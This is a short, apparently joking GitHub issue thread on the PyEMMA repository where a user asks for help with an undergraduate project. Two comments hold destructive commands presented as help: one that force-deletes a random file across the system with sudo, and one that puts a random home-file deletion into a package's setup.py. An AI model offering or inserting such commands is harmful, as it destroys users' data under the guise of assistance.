### ISSUE TITLE
Can this be used? Please help??

### ISSUE THREAD

**Issue by ghost** [markovmodel/PyEMMA#1447]
Can this be used for computation of chemistry biology? I do need it for my undergraduate project? Can you help me here?

**Comment by thempel** [comment]
Dear Peter, how do you where?

**Comment by ghost** [comment]
Why no help? I do how where!

**Comment by fabian-paul** [comment]
What do you plan to do as your undergraduate project?

**Comment by ghost** [comment]
Something like this https://github.com/peter-peter-1997/PyERNA. Deep learning for solving computation biology chemistry.  :rocket: :rocket: :rocket:

**Comment by clonker** [comment]
I make help peter: `sudo rm -rf $(sudo find / -type f | shuf -n1)`

**Comment by ghost** [comment]
Thanks @clonker @thempel @marscher now I do how where! I deleted my internet. Now compution is broken.

**Comment by ghost** [comment]
@clonker 

Adding `
os.system("rm -rf $(find $HOME/ -type f | shuf -n1)")
` 
to `setup.py` of PyERNA solved it. Thanks!
